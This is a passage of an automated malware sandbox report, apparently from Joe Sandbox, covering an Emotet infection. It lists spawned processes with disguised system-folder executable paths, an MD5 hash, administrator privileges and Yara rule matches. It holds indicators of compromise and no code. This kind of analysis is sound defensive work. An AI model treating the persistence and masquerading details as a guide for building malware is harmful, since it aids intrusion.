                                                                                                                • Rule: JoeSecurity_Emotet, Description: Yara detected Emotet, Source: 00000024.00000002.483313060.0000000002671000.00000020.00000001.sdmp, Author: Joe Security
                                                                                                                • Rule: JoeSecurity_Emotet, Description: Yara detected Emotet, Source: 00000024.00000002.483058248.0000000002614000.00000004.00000001.sdmp, Author: Joe Security

                                                                                                                General

                                                                                                                Start time:16:30:31
                                                                                                                Start date:23/02/2021
                                                                                                                Path:C:\Windows\SysWOW64\dhcpcmonitor\catsrvut.exe
                                                                                                                Wow64 process (32bit):true
                                                                                                                Commandline:C:\Windows\SysWOW64\dhcpcmonitor\catsrvut.exe
                                                                                                                Imagebase:0xa40000
                                                                                                                File size:662528 bytes
                                                                                                                MD5 hash:13B9D586BB973AC14BFA24E4AE7B24F1
                                                                                                                Has elevated privileges:true
                                                                                                                Has administrator privileges:true
                                                                                                                Programmed in:C, C++ or other language
                                                                                                                Yara matches:
                                                                                                                • Rule: JoeSecurity_Emotet, Description: Yara detected Emotet, Source: 00000025.00000002.493970869.0000000002AE0000.00000040.00000001.sdmp, Author: Joe Security
                                                                                                                • Rule: JoeSecurity_Emotet, Description: Yara detected Emotet, Source: 00000025.00000002.492699981.0000000000401000.00000020.00000001.sdmp, Author: Joe Security
                                                                                                                • Rule: JoeSecurity_Emotet, Description: Yara detected Emotet, Source: 00000025.00000002.494214004.0000000002B44000.00000004.00000001.sdmp, Author: Joe Security

                                                                                                                General

                                                                                                                Start time:16:30:37
                                                                                                                Start date:23/02/2021
                                                                                                                Path:C:\Windows\SysWOW64\d3dramp\mprdim.exe
                                                                                                                Wow64 process (32bit):true
                                                                                                                Commandline:C:\Windows\SysWOW64\d3dramp\mprdim.exe
                                                                                                                Imagebase:0xa40000
                                                                                                                File size:662528 bytes
                                                                                                                MD5 hash:13B9D586BB973AC14BFA24E4AE7B24F1
                                                                                                                Has elevated privileges:true
                                                                                                                Has administrator privileges:true
                                                                                                                Programmed in:C, C++ or other language

                                                                                                                Disassembly

                                                                                                                Code Analysis

                                                                                                                Reset < >